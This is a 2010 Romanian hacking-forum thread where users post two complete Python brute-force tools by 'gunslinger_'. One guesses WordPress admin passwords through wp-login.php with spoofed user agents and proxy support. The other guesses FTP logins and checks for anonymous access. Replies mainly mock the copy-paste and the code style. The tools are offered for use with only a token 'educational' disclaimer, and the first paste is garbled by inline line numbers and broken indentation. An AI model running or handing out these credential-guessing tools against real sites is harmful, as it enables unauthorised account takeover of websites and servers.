Wordpress bruteforcer (python script) 04.08.2010

[hozarares]

001   #!/usr/bin/python 
002	# This is wordpress bruteforcer tools 
003	# This was written for educational purpose and pentest only. Use it at your own risk. 
004	# Author will not be responsible for any damage !! 
005	# Toolname  : wpbruteforcer.py 
006	# Programmer    : gunslinger_  
007	# Version   : 1.0 
008	# Date      : Wed Aug  4 13:38:13 WIT 2010 
009	  
010	import re 
011	import os 
012	import sys 
013	import random 
014	import warnings 
015	import time 
016	try: 
017	    import mechanize 
018	except ImportError: 
019	    print "
[*] Please install mechanize python module first" 
020	    sys.exit(1) 
021	except KeyboardInterrupt: 
022	    print "\n
[*] Exiting program...\n" 
023	    sys.exit(1) 
024	try: 
025	    import cookielib 
026	except ImportError: 
027	    print "[*] Please install cookielib python module first" 
028	    sys.exit(1) 
029	except KeyboardInterrupt: 
030	    print "\n[*] Exiting program...\n" 
031	    sys.exit(1) 
032	  
033	warnings.filterwarnings(action="ignore", message=".*gzip transfer encoding is experimental!", category=UserWarning) 
034	  
035	# define variable 
036	__programmer__  = "gunslinger_ " 
037	__version__     = "1.0" 
038	verbose     = False 
039	useproxy    = False 
040	usepassproxy    = False 
041	log     = 'wpbruteforcer.log' 
042	file        = open(log, "a") 
043	success     = 'Dashboard' 
044	# some cheating .. 
045	ouruseragent    = ['Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.10 sun4u; X11)', 046	        'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2pre) Gecko/20100207 Ubuntu/9.04 (jaunty) Namoroka/3.6.2pre', 
047	        'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser;', 
048	        'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)', 
049	            'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)', 
050	            'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)', 
051	            'Microsoft Internet Explorer/4.0b1 (Windows 95)', 
052	            'Opera/8.00 (Windows NT 5.1; U; en)', 
053	        'amaya/9.51 libwww/5.4.0', 
054	        'Mozilla/4.0 (compatible; MSIE 5.0; AOL 4.0; Windows 95; c_athome)', 
055	        'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)', 
056	        'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)', 
057	        'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; ZoomSpider.net bot; .NET CLR 1.1.4322)', 
058	        'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; QihooBot 1.0 [email]qihoobot@qihoo.net[/email])', 
059	        'Mozilla/4.0 (compatible; MSIE 5.0; Windows ME) Opera 5.11 [en]' 
060	        ] 
061	wordpress   = ''' 
062	                       _ 
063	                      | | 
064	__      _____  _ __ __| |_ __  _ __ ___  ___ ___ 
065	\ \ /\ / / _ \| '__/ _` | '_ \| '__/ _ \/ __/ __| 
066	 \ V  V / (_) | | | (_| | |_) | | |  __/\\__ \\__ \\ 
067	  \_/\_/ \\___/|_|  \__,_| .__/|_|  \\___||___/___/ 
068	                        | | 
069	                        |_|      bruteforcer... 
070	  
071	Programmer : %s 
072	Version    : %s''' % (__programmer__, __version__) 
073	option          = ''' 
074	Usage  : %s [options] 
075	Option : -t, --target           |   Site for bruteforce wp-admin 
076	         -u, --username             |   User for bruteforcing 
077	         -w, --wordlist             |   Wordlist used for bruteforcing 
078	         -v, --verbose              |   Set %s will be verbose (more talkactiveable) 079	         -p, --proxy           |   Set http proxy will be use 
080	         -k, --usernameproxy        |   Set username at proxy will be use 
081	         -i, --passproxy        |   Set password at proxy will be use 
082	         -l, --log          |   Specify output filename (default : fbbruteforcer.log) 083	         -h, --help                     |   Print this help 
084	  
085	Example : %s -t target.com -u jack -w wordlist.txt" 
086	  087	P.S : add "&" to run in the background 
088	''' % (sys.argv[0], sys.argv[0], sys.argv[0]) 
089	hme         = ''' 
090	Usage : %s [option] 
091	    -h or --help for get help 
092	    ''' % sys.argv[0] 
093	  
094	def helpme(): 
095	    print wordpress 
096	    print option 
097	    file.write(wordpress) 
098	    file.write(option) 
099	    sys.exit(1) 
100	  
101	def helpmee(): 
102	    print wordpress 
103	    print hme 
104	    file.write(wordpress) 
105	    file.write(hme) 
106	    sys.exit(1) 
107	  
108	for arg in sys.argv: 
109	    try: 
110	        if arg.lower() == '-u' or arg.lower() == '--user': 
111	                    username = sys.argv[int(sys.argv[1:].index(arg))+2] 
112	            if arg.lower() == '-t' or arg.lower() == '--target': 
113	                    target = sys.argv[int(sys.argv[1:].index(arg))+2] 
114	                    if "http://" in target: 
115	                        target = target.replace("http://","") 
116	                    if "www." in target: 
117	                        target = target.replace("www.","") 
118	                    targetsite = "http://www."+target+"/wp-login.php" 
119	        elif arg.lower() == '-w' or arg.lower() == '--wordlist': 
120	                    wordlist = sys.argv[int(sys.argv[1:].index(arg))+2] 
121	            elif arg.lower() == '-l' or arg.lower() == '--log': 
122	                    log = sys.argv[int(sys.argv[1:].index(arg))+2] 
123	            elif arg.lower() == '-p' or arg.lower() == '--proxy': 
124	                useproxy = True 
125	                    proxy = sys.argv[int(sys.argv[1:].index(arg))+2] 
126	            elif arg.lower() == '-k' or arg.lower() == '--userproxy': 
127	                usepassproxy = True 
128	                    usw = sys.argv[int(sys.argv[1:].index(arg))+2] 
129	            elif arg.lower() == '-i' or arg.lower() == '--passproxy': 
130	                usepassproxy = True 
131	                    usp = sys.argv[int(sys.argv[1:].index(arg))+2] 
132	        elif arg.lower() == '-v' or arg.lower() == '--verbose': 
133	                    verbose = True 
134	            elif arg.lower() == '-h' or arg.lower() == '--help': 
135	                helpme() 
136	        elif len(sys.argv) <= 1:
137	            helpmee()
138	    except IOError:
139	        helpme()
140	    except NameError:
141	        helpme()
142	    except IndexError:
143	        helpme()
144	 
145	def bruteforce(word):
146	    try:
147	        sys.stdout.write("\r[*] Trying %s...                   \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t " % word)
148	        file.write("[*] Trying %s\n" % word)
149	        sys.stdout.flush()
150	        br.addheaders = [('User-agent', random.choice(ouruseragent))]
151	        opensite = br.open(targetsite)
152	        br.select_form(nr=0)
153	        br.form['log'] = username
154	        br.form['pwd'] = word
155	        br.submit()
156	        response = br.response().read()
157	        if verbose:
158	            print response
159	        if success in response:
160	            print "\n\n[*] Logging in success..."
161	            print "[*] Username : %s" % (username)
162	            print "[*] Password : %s\n" % (word)
163	            file.write("\n[*] Logging in success...")
164	            file.write("\n[*] Username : %s" % (username))
165	            file.write("\n[*] Password : %s\n\n" % (word))
166	            sys.exit(1)
167	    except KeyboardInterrupt:
168	        print "\n[*] Exiting program...\n"
169	        sys.exit(1)
170	    except mechanize._mechanize.FormNotFoundError:
171	        print "\n[*] Can't launch attack sorry, form is different\n"
172	        file.write("\n[*] Can't launch attack sorry, form is different\n")
173	        sys.exit(1)
174	    except mechanize._form.ControlNotFoundError:
175	        print "\n[*] Can't launch attack sorry, form is different\n"
176	        file.write("\n[*] Can't launch attack sorry, form is different\n")
177	        sys.exit(1)
178	 
179	def releaser():
180	    global word
181	    for word in words:
182	        bruteforce(word.replace("\n",""))
183	 
184	def main():
185	    global br
186	    global words
187	    try:
188	        br = mechanize.Browser()
189	        cj = cookielib.LWPCookieJar()
190	        br.set_cookiejar(cj)
191	        br.set_handle_equiv(True)
192	        br.set_handle_gzip(True)
193	        br.set_handle_redirect(True)
194	        br.set_handle_referer(True)
195	        br.set_handle_robots(False)
196	        br.set_debug_http(False)
197	        br.set_debug_redirects(False)
198	        br.set_debug_redirects(False)
199	        br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
200	        if useproxy:
201	            br.set_proxies({"http": proxy})
202	        if usepassproxy:
203	            br.add_proxy_password(usw, usp)
204	        if verbose:
205	            br.set_debug_http(True)
206	            br.set_debug_redirects(True)
207	            br.set_debug_redirects(True)
208	    except KeyboardInterrupt:
209	        print "\n[*] Exiting program...\n"
210	        file.write("\n[*] Exiting program...\n")
211	        sys.exit(1)
212	    try:
213	        preventstrokes = open(wordlist, "r")
214	        words          = preventstrokes.readlines()
215	        count          = 0
216	        while count < len(words):
217	            words[count] = words[count].strip()
218	            count += 1
219	    except IOError:
220	        print "\n[*] Error: Check your wordlist path\n"
221	        file.write("\n[*] Error: Check your wordlist path\n")
222	        sys.exit(1)
223	    except NameError:
224	        helpme()
225	    except KeyboardInterrupt:
226	        print "\n[*] Exiting program...\n"
227	        file.write("\n[*] Exiting program...\n")
228	        sys.exit(1)
229	    try:
230	        print wordpress
231	        print "\n[*] Starting attack at %s" % time.strftime("%X")
232	        print "[*] Target site : %s" % (targetsite)
233	        print "[*] Account for bruteforcing \"%s\"" % (username)
234	        print "[*] Loaded :",len(words),"words"
235	        print "[*] Bruteforcing wp-login, please wait..."
236	        file.write(wordpress)
237	        file.write("\n[*] Starting attack at %s" % time.strftime("%X"))
238	        file.write("\n[*] Target site : %s" % (targetsite))
239	        file.write("\n[*] Account for bruteforcing \"%s\"" % (username))
240	        file.write("\n[*] Loaded : %d words" % int(len(words)))
241	        file.write("\n[*] Bruteforcing wp-login, please wait...\n")
242	    except KeyboardInterrupt:
243	        print "\n[*] Exiting program...\n"
244	        sys.exit(1)
245	    try:
246	        releaser()
247	        bruteforce(word)
248	    except NameError:
249	        helpme()
250	 
251	if __name__ == '__main__':
252	    main()

Edited August 7, 2010 by Nytro

[blech]

copy/paste... este de toata jena! dece ai mai postat?

-nu te-ai chinuit sa scrii si tu cateva cuvinte (ai dat doar copy/paste)

-nu ai dat sursa

-nu ai dat credits

merita sa mai zic ceva?

later edit:

ca sa nu mai fac inca un post... am vazut ca ai facut formatting...dar cu restu nu sunt de aceeasi parere cu tine

[Fitty]

use [ code ] !! Si cand dai copy paste, dai din raw mode, ca altfel apar numerele liniilor

[hozarares]

gata ma .... l`am reparat !!!

@Bleach ....

- da...am dat copy/paste dupa cum mi`a venit in email;

- si nu, nu ma chinui sa scriu nimic;nu dau credits;

Poti sa zici ce vrei !!!

[Guest Mosad]

blech,scrie in sursa cine e autorul.

[cmiN]

Cel mai urat cod care l-am vazut in viata mea ... nu ma refer neaparat ca identarea e = cu 0 si ca sunt numere in fata, dar pur si simplu e scris si strcturat aiurea si dezordonat ... pana si lexx facuse "virusul" ala in php mai lizibil -,-.

[Flubber]

Recunosc acest stil de a programa in Python si de pe luna, gunslinger's style, un FTP bruteforcer tot de el scris:

#!/usr/bin/python
################################################################ 
#       .___             __          _______       .___        # 
#     __| _/____ _______|  | __ ____ \   _  \    __| _/____    # 
#    / __ |\__  \\_  __ \  |/ // ___\/  /_\  \  / __ |/ __ \   # 
#   / /_/ | / __ \|  | \/    <\  \___\  \_/   \/ /_/ \  ___/   # 
#   \____ |(______/__|  |__|_ \\_____>\_____  /\_____|\____\   # 
#        \/                  \/             \/                 # 
#                   ___________   ______  _  __                # 
#                 _/ ___\_  __ \_/ __ \ \/ \/ /                # 
#                 \  \___|  | \/\  ___/\     /                 # 
#                  \___  >__|    \___  >\/\_/                  # 
#      est.2007        \/            \/   forum.darkc0de.com   # 
################################################################
# This is ftp brute force tools [Updated].
# This was written for educational purpose and pentest only. Use it at your own risk.
# Update : More efficient
#	 : prevent loss added 
#	 : Anonymous checker added
# VISIT : http://www.devilzc0de.com
# CODING BY : gunslinger_
# EMAIL : gunslinger.devilzc0de@gmail.com
# TOOL NAME : ftpbrute.py v1.5
# Big thanks darkc0de member : d3hydr8, Kopele, icedzomby, VMw4r3 and all member
# Special thanks to devilzc0de crew : mywisdom, petimati, peneter, flyff666, rotlez, 7460, xtr0nic, devil_nongkrong, cruzen and all devilzc0de family 
# Greetz : all member of jasakom.com, jatimcrew.com
# Special i made for jasakom member and devilzc0de family
# Please remember... your action will be logged in target system...
# Author will not be responsible for any damage !!
# Use it with your own risk 

import sys
import time
import os
from ftplib import FTP

if sys.platform == 'linux-i386' or sys.platform == 'linux2' or sys.platform == 'darwin':
	SysCls = 'clear'
elif sys.platform == 'win32' or sys.platform == 'dos' or sys.platform[0:5] == 'ms-dos':
	SysCls = 'cls'
else:
	SysCls = 'unknown'

log = "ftpbrute.log"

face = 	'''
           .___             .__ .__                  _______       .___                                       				
         __| _/ ____ ___  __|__||  |  ________  ____ \   _  \    __| _/ ____     ____ _______   ____ __  _  __				
        / __ |_/ __ \\\  \/ /|  ||  |  \___   /_/ ___\/  /_\  \  / __ |_/ __ \  _/ ___\\\_  __ \_/ __ \\\ \/ \/ /				
       / /_/ |\  ___/ \   / |  ||  |__ /    / \  \___\  \_/   \/ /_/ |\  ___/  \  \___ |  | \/\  ___/ \     / 				
       \____ | \___  > \_/  |__||____//_____ \ \___  >\_____  /\____ | \___  >  \___  >|__|    \___  > \/\_/  				
            \/     \/                       \/     \/       \/      \/     \/       \/             \/         				
												http://www.devilzc0de.com			
												by : gunslinger_				
ftpbrute.py version 1.0                                     											
Brute forcing ftp target     															
Programmmer : gunslinger_                                    											
gunslinger[at]devilzc0de[dot]com                             											
_____________________________________________________________________________________________________________________________________________ 
'''

option = '''
Usage: ./ftpbrute.py [options]
Options: -t, --target    <hostname/ip>   |   Target to bruteforcing 
         -u, --user      <user>          |   User for bruteforcing
         -w, --wordlist  <filename>      |   Wordlist used for bruteforcing
         -h, --help      <help>          |   print this help

Example: ./ftpbrute.py -t 192.168.1.1 -u root -w wordlist.txt

'''

file = open(log, "a")

def MyFace() :
	os.system(SysCls)
	print face
	file.write(face)


def HelpMe() :
	MyFace()
	print option
	file.write(option)
	sys.exit(1)

for arg in sys.argv:
	if arg.lower() == '-t' or arg.lower() == '--target':
            hostname = sys.argv[int(sys.argv[1:].index(arg))+2]
	elif arg.lower() == '-u' or arg.lower() == '--user':
            user = sys.argv[int(sys.argv[1:].index(arg))+2]
	elif arg.lower() == '-w' or arg.lower() == '--wordlist':
            wordlist = sys.argv[int(sys.argv[1:].index(arg))+2]
	elif arg.lower() == '-h' or arg.lower() == '--help':
        	HelpMe()
	elif len(sys.argv) <= 1:
		HelpMe()

def checkanony() : 
	try:
		print "\n[+] Checking for anonymous login\n"
		ftp = FTP(hostname)
		ftp.login()
		ftp.retrlines('LIST')
		print "\n[!] Anonymous login successfuly !\n"
		ftp.quit()
	except Exception, e:
        	print "\n[-] Anonymous login unsuccessful...\n"
		pass



def BruteForce(word) :
	print "[?]Trying :",word
	file.write("\n[?]Trying :"+word)
     	try:
		ftp = FTP(hostname)
		ftp.login(user, word)
		ftp.retrlines('list')
		ftp.quit()
		print "\n\t[!] Login Success ! "
		print "\t[!] Username : ",user, ""
		print "\t[!] Password : ",word, ""
		print "\t[!] Hostname : ",hostname, ""
		print "\t[!] Log all has been saved to",log,"\n"
		file.write("\n\n\t[!] Login Success ! ")
		file.write("\n\t[!] Username : "+user )
		file.write("\n\t[!] Password : "+word )
		file.write("\n\t[!] Hostname : "+hostname)
		file.write("\n\t[!] Log all has been saved to "+log)
		sys.exit(1)
   	except Exception, e:
        	#print "[-] Failed"
		pass
	except KeyboardInterrupt:
		print "\n[-] Aborting...\n"
		file.write("\n[-] Aborting...\n")
		sys.exit(1)

MyFace()
print "[!] Starting attack at %s" % time.strftime("%X")
print "[!] System Activated for brute forcing..."
print "[!] Please wait until brute forcing finish !\n"
file.write("\n[!] Starting attack at %s" % time.strftime("%X"))
file.write("\n[!] System Activated for brute forcing...")
file.write("\n[!] Please wait until brute forcing finish !\n")
checkanony()	

try:
	preventstrokes = open(wordlist, "r")
	words 	       = preventstrokes.readlines()
	count          = 0 
	while count < len(words): 
		words[count] = words[count].strip() 
		count += 1 
except(IOError): 
  	print "\n[-] Error: Check your wordlist path\n"
	file.write("\n[-] Error: Check your wordlist path\n")
  	sys.exit(1)

print "\n[+] Loaded:",len(words),"words"
print "[+] Server:",hostname
print "[+] User:",user
print "[+] BruteForcing...\n"
for word in words:
	BruteForce(word.replace("\n",""))

file.close()